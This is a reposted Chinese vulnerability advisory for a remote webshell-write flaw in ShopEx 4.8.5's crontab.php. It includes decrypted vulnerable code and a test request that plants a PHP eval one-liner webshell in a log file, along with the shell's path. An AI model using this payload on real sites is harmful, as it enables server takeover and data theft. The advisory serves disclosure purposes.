首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
shopex 4.8.5.45144 \core\include_v5\crontab.php 远程shell写入漏洞
来源:www.sebug.net 作者:sebug 发布时间:2010-06-17  

影响版本:
shopex 4.8.5.45144
漏洞描述:
ShopEx网上商店平台软件系统又称网店管理系统、网店程序、网上购物系统、在线购物系统。

\core\include_v5\crontab.php (zend加密后的,我只发布解密后的代码)

01 public function  run( )
02                 {
03                                 $this->logFile = HOME_DIR."/logs/access.log.php";
04                                 $this->now = time( );
05                                 $this->viewStat( );
06                                 $messenger =& $this->loadModel( "system/messenger" );
07                                 $messenger->runQueue( );
08                 }
09 
10                 public function viewStat( )
11                 {
12                                 if ( !file_exists( $this->logFile ) )
13                                 {
14                                                 file_put_contents( $this->logFile, "#<?php exit()?>\n" );   //囧之处!By:小翔
15                                 }
16                                 if ( isset( $_GET['action'] ) )
17                                 {
18                                                 error_log( $this->now."\t".$_GET['action']."\t".$_GET['p']."\n", 3, $this->logFile );//没有任何过滤,By:小翔
<*参考
http://www.t00ls.net/
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
直接提交:http://127.0.0.1/shopex/?cron=1&action=1&p=1<?php%20eval($_POST[cmd])?>
一句话在:http://127.0.0.1/shopex/home/logs/access.log.php
SEBUG安全建议:
厂商补丁:

ShopEx.cn
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.ShopEx.cn


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·DedeCms V5.6 plus/advancedsear
·HDWiki百科程序后台Getshell漏洞
·PHP代码执行漏洞-总结
·百度贴吧吧主密码窃取漏洞
·Php168一个即将被补的代码执行?
·DEDECMS v5.5 GBK Final 的一个
·IIS源码泄露及文件类型解析错误
·nginx文件类型错误解析漏洞
·Discuz! 6.x/7.x 全局变量防御绕
·New Includes Function -- spl_a
·当magic_quotes_gpc=off
·关于magic_quotes_sybase
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved